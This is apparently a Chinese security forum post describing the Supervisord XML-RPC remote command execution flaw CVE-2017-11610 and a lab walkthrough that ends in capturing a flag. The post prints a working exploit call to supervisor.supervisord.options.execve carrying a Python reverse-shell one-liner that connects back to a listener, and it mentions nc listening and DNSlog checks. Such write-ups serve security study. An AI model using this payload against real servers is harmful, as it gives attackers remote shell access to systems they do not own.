安全矩阵

 找回密码
 立即注册
搜索
查看: 2636|回复: 0

Supervisord 远程命令执行漏洞(CVE-2017-11610)

[复制链接]

98

主题

207

帖子

955

积分

高级会员

Rank: 4

积分
955
发表于 2020-8-12 16:54:28 | 显示全部楼层 |阅读模式
1. 概述Supervisord 是使用 Python 开发的进程管理程序,Supervisord 能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord 拥有监控进程状态的功能,在进程异常退出时能够自动重启进程。
Supervisord 在配置了 Web 接口后,服务器会启动一个 XMLRPC 服务器,端口号为 9001,利用本漏洞,在获取接口访问权限后,远程攻击者可利用发送一段精心构造的请求,导致可在服务器执行任意代码。
首先打开靶场,并进行抓包。

利用 POC 去执行,发现无回显,用 DNSlog 去验证。

然后在跳板机上用 nc 监听。

利用 POC 反弹shell, poc 如下。
` supervisor.supervisord.options.execve
/usr/bin/python python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); `

反弹过来 shell,查看 tmp 临时文件来拿 Flag。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 03:38 , Processed in 0.013774 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表